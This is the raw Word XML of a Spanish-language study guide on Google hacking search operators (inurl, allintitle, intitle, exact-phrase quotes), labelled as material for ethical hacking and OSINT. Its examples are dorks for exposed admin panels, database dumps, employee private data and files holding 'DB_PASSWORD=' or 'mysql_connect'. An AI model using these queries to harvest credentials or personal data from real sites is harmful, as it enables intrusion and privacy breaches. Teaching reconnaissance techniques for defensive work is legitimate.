    <w:p w14:paraId="77C71150" w14:textId="77777777" w:rsidR="00C35C7D" w:rsidRPr="00C35C7D" w:rsidRDefault="00C35C7D" w:rsidP="00C35C7D">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00C35C7D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Qué hace:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C35C7D">
        <w:t> Localiza URLs que incluyan “admin” y “portal”, útil para encontrar paneles de administración expuestos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4342F04F" w14:textId="77777777" w:rsidR="00D1134F" w:rsidRPr="00D1134F" w:rsidRDefault="00D1134F" w:rsidP="00D1134F">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1134F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>inurl:término</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A09EED9" w14:textId="77777777" w:rsidR="00D1134F" w:rsidRPr="00D1134F" w:rsidRDefault="00D1134F" w:rsidP="00D1134F">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00D1134F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Descripción:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D1134F">
        <w:t> Similar a </w:t>
      </w:r>
      <w:r w:rsidRPr="00D1134F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>allinurl</w:t>
      </w:r>
      <w:r w:rsidRPr="00D1134F">
        <w:t>, pero se puede combinar con otras palabras de búsqueda. Devuelve URLs que contengan el término.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A1CE71A" w14:textId="77777777" w:rsidR="00D1134F" w:rsidRPr="00D1134F" w:rsidRDefault="00D1134F" w:rsidP="00D1134F">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00D1134F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Ejemplo:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D1134F">
        <w:t> inurl:wp-admin "vulnerabilities"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71DABC6A" w14:textId="77777777" w:rsidR="00D1134F" w:rsidRDefault="00D1134F" w:rsidP="00D1134F">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00D1134F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Qué hace:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D1134F">
        <w:t> Filtra páginas donde la URL contenga “wp-admin” y mencione “vulnerabilities” en el texto, para detectar fallos en WordPress.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8B3FF2" w14:textId="77777777" w:rsidR="00D1134F" w:rsidRPr="00D1134F" w:rsidRDefault="00D1134F" w:rsidP="00D1134F">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1134F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>allintitle:términos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65210A7E" w14:textId="77777777" w:rsidR="00D1134F" w:rsidRPr="00D1134F" w:rsidRDefault="00D1134F" w:rsidP="00D1134F">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00D1134F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Descripción:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D1134F">
        <w:t> Limita los resultados a páginas cuyo título contenga todos los términos indicados.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9C6CF9" w14:textId="77777777" w:rsidR="00D1134F" w:rsidRPr="00D1134F" w:rsidRDefault="00D1134F" w:rsidP="00D1134F">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00D1134F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Ejemplo:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D1134F">
        <w:t> allintitle:"database dump"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F0D6731" w14:textId="77777777" w:rsidR="00D1134F" w:rsidRPr="00D1134F" w:rsidRDefault="00D1134F" w:rsidP="00D1134F">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00D1134F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Qué hace:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D1134F">
        <w:t> Muestra resultados con “database dump” en el título, posible indicio de bases de datos expuestas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F34542" w14:textId="77777777" w:rsidR="00D1134F" w:rsidRPr="00D1134F" w:rsidRDefault="00D1134F" w:rsidP="00D1134F">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08B18C82" w14:textId="77777777" w:rsidR="00DE5A0F" w:rsidRPr="00DE5A0F" w:rsidRDefault="00DE5A0F" w:rsidP="00DE5A0F">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE5A0F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>intitle:término</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E6811D3" w14:textId="77777777" w:rsidR="00DE5A0F" w:rsidRPr="00DE5A0F" w:rsidRDefault="00DE5A0F" w:rsidP="00DE5A0F">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00DE5A0F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Descripción:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE5A0F">
        <w:t> Similar a </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE5A0F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>allintitle</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE5A0F">
        <w:t>, pero se puede combinar con otros términos. Devuelve páginas cuyo título contenga el término.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="198080C7" w14:textId="77777777" w:rsidR="00DE5A0F" w:rsidRPr="00B941CC" w:rsidRDefault="00DE5A0F" w:rsidP="00DE5A0F">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00B941CC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Ejemplo:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B941CC">
        <w:t> intitle:"sql injection" "bypass authentication"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D923D0" w14:textId="77777777" w:rsidR="00DE5A0F" w:rsidRPr="00DE5A0F" w:rsidRDefault="00DE5A0F" w:rsidP="00DE5A0F">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00DE5A0F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Qué hace:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE5A0F">
        <w:t> Retorna resultados que en el título incluyan “sql injection” y mencionen “bypass authentication” en el contenido.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6EB1F3" w14:textId="77777777" w:rsidR="00DE5A0F" w:rsidRPr="00DE5A0F" w:rsidRDefault="00DE5A0F" w:rsidP="00DE5A0F">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE5A0F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Operadores Booleanos Google Hacking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E7C53C" w14:textId="77777777" w:rsidR="00387D4A" w:rsidRDefault="00387D4A" w:rsidP="00387D4A">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00387D4A">
        <w:t>Estos operadores permiten combinar o filtrar términos para obtener resultados más específicos en búsquedas OSINT o de información sensible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06ACFD7B" w14:textId="77777777" w:rsidR="00453A65" w:rsidRDefault="00453A65" w:rsidP="00387D4A">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49FBED3C" w14:textId="77777777" w:rsidR="00453A65" w:rsidRDefault="00453A65" w:rsidP="00387D4A">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15BC264C" w14:textId="77777777" w:rsidR="00453A65" w:rsidRDefault="00453A65" w:rsidP="00387D4A">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B7D9215" w14:textId="77777777" w:rsidR="00453A65" w:rsidRDefault="00453A65" w:rsidP="00387D4A">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="499A01B6" w14:textId="77777777" w:rsidR="00453A65" w:rsidRDefault="00453A65" w:rsidP="00387D4A">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A6B04A4" w14:textId="77777777" w:rsidR="00453A65" w:rsidRDefault="00453A65" w:rsidP="00387D4A">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FF4ED87" w14:textId="77777777" w:rsidR="00453A65" w:rsidRDefault="00453A65" w:rsidP="00387D4A">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DE1F838" w14:textId="77777777" w:rsidR="00453A65" w:rsidRDefault="00453A65" w:rsidP="00387D4A">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CE1E1F9" w14:textId="77777777" w:rsidR="00453A65" w:rsidRPr="00387D4A" w:rsidRDefault="00453A65" w:rsidP="00387D4A">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13F8D1E5" w14:textId="77777777" w:rsidR="00387D4A" w:rsidRPr="00387D4A" w:rsidRDefault="00387D4A" w:rsidP="00387D4A">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00387D4A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>" "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B98FCD5" w14:textId="77777777" w:rsidR="00387D4A" w:rsidRPr="00387D4A" w:rsidRDefault="00387D4A" w:rsidP="00387D4A">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00387D4A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Descripción:</w:t>
      </w:r>
      <w:r w:rsidRPr="00387D4A">
        <w:t> Busca la frase exacta, sin variaciones.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47284B86" w14:textId="77777777" w:rsidR="00387D4A" w:rsidRPr="00387D4A" w:rsidRDefault="00387D4A" w:rsidP="00387D4A">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00387D4A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Ejemplo:</w:t>
      </w:r>
      <w:r w:rsidRPr="00387D4A">
        <w:t> "employee private data"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE62CD7" w14:textId="77777777" w:rsidR="00387D4A" w:rsidRDefault="00387D4A" w:rsidP="00387D4A">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00387D4A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Qué hace:</w:t>
      </w:r>
      <w:r w:rsidRPr="00387D4A">
        <w:t> Devuelve resultados que incluyan exactamente “employee private data”, revelando posible exposición de dato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453A65" w14:paraId="4B970C98" w14:textId="77777777" w:rsidTr="00453A65">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10790" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6E92632C" w14:textId="77777777" w:rsidR="00453A65" w:rsidRPr="00453A65" w:rsidRDefault="00453A65" w:rsidP="00453A65">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00453A65">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>" " (Comillas) - SUPER BREVE</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00F38141" w14:textId="77777777" w:rsidR="00453A65" w:rsidRPr="00453A65" w:rsidRDefault="00453A65" w:rsidP="00453A65">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00453A65">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Sintaxis:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18B24E3E" w14:textId="77777777" w:rsidR="00453A65" w:rsidRPr="00453A65" w:rsidRDefault="00453A65" w:rsidP="00453A65">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00453A65">
              <w:t>"frase exacta"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B7059C6" w14:textId="77777777" w:rsidR="00453A65" w:rsidRPr="00453A65" w:rsidRDefault="00453A65" w:rsidP="00453A65">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00453A65">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>¿Qué hace?</w:t>
            </w:r>
            <w:r w:rsidRPr="00453A65">
              <w:t xml:space="preserve"> Busca la </w:t>
            </w:r>
            <w:r w:rsidRPr="00453A65">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>frase EXACTA</w:t>
            </w:r>
            <w:r w:rsidRPr="00453A65">
              <w:t>, palabra por palabra, sin variaciones.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7030B736" w14:textId="77777777" w:rsidR="00453A65" w:rsidRPr="00453A65" w:rsidRDefault="00B941CC" w:rsidP="00453A65">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:pict w14:anchorId="694A03B1">
                <v:rect id="_x0000_i1035" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
              </w:pict>
            </w:r>
          </w:p>
          <w:p w14:paraId="17F1969B" w14:textId="77777777" w:rsidR="00453A65" w:rsidRPr="00453A65" w:rsidRDefault="00453A65" w:rsidP="00453A65">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00453A65">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Comparación:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A2B7D78" w14:textId="77777777" w:rsidR="00453A65" w:rsidRPr="00453A65" w:rsidRDefault="00453A65" w:rsidP="00453A65">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00453A65">
              <w:t>admin panel</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6179312B" w14:textId="77777777" w:rsidR="00453A65" w:rsidRPr="00453A65" w:rsidRDefault="00453A65" w:rsidP="00453A65">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00453A65">
              <w:t>→ Busca páginas con "admin" Y "panel" (pueden estar separadas)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="016030E4" w14:textId="77777777" w:rsidR="00453A65" w:rsidRPr="00453A65" w:rsidRDefault="00453A65" w:rsidP="00453A65">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="62404E61" w14:textId="77777777" w:rsidR="00453A65" w:rsidRPr="00453A65" w:rsidRDefault="00453A65" w:rsidP="00453A65">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00453A65">
              <w:t>"admin panel"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="580BB7E1" w14:textId="77777777" w:rsidR="00453A65" w:rsidRPr="00453A65" w:rsidRDefault="00453A65" w:rsidP="00453A65">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00453A65">
              <w:t>→ Busca EXACTAMENTE la frase "admin panel" junta</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="549A1378" w14:textId="77777777" w:rsidR="00453A65" w:rsidRPr="00453A65" w:rsidRDefault="00B941CC" w:rsidP="00453A65">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:pict w14:anchorId="577C7E7B">
                <v:rect id="_x0000_i1036" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
              </w:pict>
            </w:r>
          </w:p>
          <w:p w14:paraId="35E9CF8A" w14:textId="77777777" w:rsidR="00453A65" w:rsidRPr="00453A65" w:rsidRDefault="00453A65" w:rsidP="00453A65">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00453A65">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Ejemplo práctico:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65CBBF04" w14:textId="77777777" w:rsidR="00453A65" w:rsidRPr="00453A65" w:rsidRDefault="00453A65" w:rsidP="00453A65">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00453A65">
              <w:t>password</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="546BED25" w14:textId="77777777" w:rsidR="00453A65" w:rsidRPr="00453A65" w:rsidRDefault="00453A65" w:rsidP="00453A65">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00453A65">
              <w:t>→ Encuentra: "password", "passwords", "passworded"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B758579" w14:textId="77777777" w:rsidR="00453A65" w:rsidRPr="00453A65" w:rsidRDefault="00453A65" w:rsidP="00453A65">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="768E5569" w14:textId="77777777" w:rsidR="00453A65" w:rsidRPr="00453A65" w:rsidRDefault="00453A65" w:rsidP="00453A65">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00453A65">
              <w:t>"password123"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D6F90E9" w14:textId="77777777" w:rsidR="00453A65" w:rsidRPr="00453A65" w:rsidRDefault="00453A65" w:rsidP="00453A65">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00453A65">
              <w:t>→ Encuentra SOLO: "password123" (exacto)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C17068C" w14:textId="77777777" w:rsidR="00453A65" w:rsidRPr="00453A65" w:rsidRDefault="00B941CC" w:rsidP="00453A65">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:pict w14:anchorId="5E0D2513">
                <v:rect id="_x0000_i1037" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
              </w:pict>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A6302C6" w14:textId="77777777" w:rsidR="00453A65" w:rsidRPr="00453A65" w:rsidRDefault="00453A65" w:rsidP="00453A65">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00453A65">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Uso en hacking ético:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="336E3E92" w14:textId="77777777" w:rsidR="00453A65" w:rsidRPr="00453A65" w:rsidRDefault="00453A65" w:rsidP="00453A65">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00453A65">
              <w:t>"DB_PASSWORD="</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27633C4F" w14:textId="77777777" w:rsidR="00453A65" w:rsidRPr="00453A65" w:rsidRDefault="00453A65" w:rsidP="00453A65">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00453A65">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>"mysql_connect"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="250D714D" w14:textId="77777777" w:rsidR="00453A65" w:rsidRPr="00453A65" w:rsidRDefault="00453A65" w:rsidP="00453A65">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00453A65">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>"&lt;?php phpinfo(); ?&gt;"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0FC05F35" w14:textId="77777777" w:rsidR="00453A65" w:rsidRPr="00453A65" w:rsidRDefault="00453A65" w:rsidP="00453A65">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00453A65">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>"Index of /backup"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62112BA0" w14:textId="77777777" w:rsidR="00453A65" w:rsidRPr="00453A65" w:rsidRDefault="00453A65" w:rsidP="00453A65">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00453A65">
              <w:t>Encuentra configuraciones, código o directorios con texto exacto.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="47C37BE1" w14:textId="77777777" w:rsidR="00453A65" w:rsidRPr="00453A65" w:rsidRDefault="00B941CC" w:rsidP="00453A65">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:pict w14:anchorId="3954356D">
                <v:rect id="_x0000_i1038" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
              </w:pict>
            </w:r>
          </w:p>
          <w:p w14:paraId="31745004" w14:textId="77777777" w:rsidR="00453A65" w:rsidRPr="00453A65" w:rsidRDefault="00453A65" w:rsidP="00453A65">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00453A65">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>En resumen:</w:t>
            </w:r>
            <w:r w:rsidRPr="00453A65">
              <w:t xml:space="preserve"> Las comillas fuerzan búsqueda literal sin sinónimos ni variaciones.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D89D402" w14:textId="77777777" w:rsidR="00453A65" w:rsidRDefault="00453A65" w:rsidP="00387D4A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="51E450C6" w14:textId="77777777" w:rsidR="00453A65" w:rsidRDefault="00453A65" w:rsidP="00387D4A">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D525ABF" w14:textId="77777777" w:rsidR="0051429C" w:rsidRDefault="0051429C" w:rsidP="00387D4A">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AA71130" w14:textId="77777777" w:rsidR="0051429C" w:rsidRDefault="0051429C" w:rsidP="00387D4A">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00197DB1" w14:textId="77777777" w:rsidR="0051429C" w:rsidRDefault="0051429C" w:rsidP="00387D4A">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="728005B9" w14:textId="77777777" w:rsidR="0051429C" w:rsidRDefault="0051429C" w:rsidP="00387D4A">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2861FD9A" w14:textId="77777777" w:rsidR="0051429C" w:rsidRDefault="0051429C" w:rsidP="00387D4A">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19922C0D" w14:textId="77777777" w:rsidR="0051429C" w:rsidRDefault="0051429C" w:rsidP="00387D4A">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7070577F" w14:textId="77777777" w:rsidR="0051429C" w:rsidRDefault="0051429C" w:rsidP="00387D4A">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55511553" w14:textId="77777777" w:rsidR="0051429C" w:rsidRDefault="0051429C" w:rsidP="00387D4A">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38F57D5A" w14:textId="77777777" w:rsidR="0051429C" w:rsidRDefault="0051429C" w:rsidP="00387D4A">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12AD3CE8" w14:textId="77777777" w:rsidR="0051429C" w:rsidRDefault="0051429C" w:rsidP="00387D4A">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07A2B823" w14:textId="77777777" w:rsidR="00453A65" w:rsidRPr="00453A65" w:rsidRDefault="00453A65" w:rsidP="00453A65">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00453A65">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>-</w:t>
      </w:r>
    </w:p>
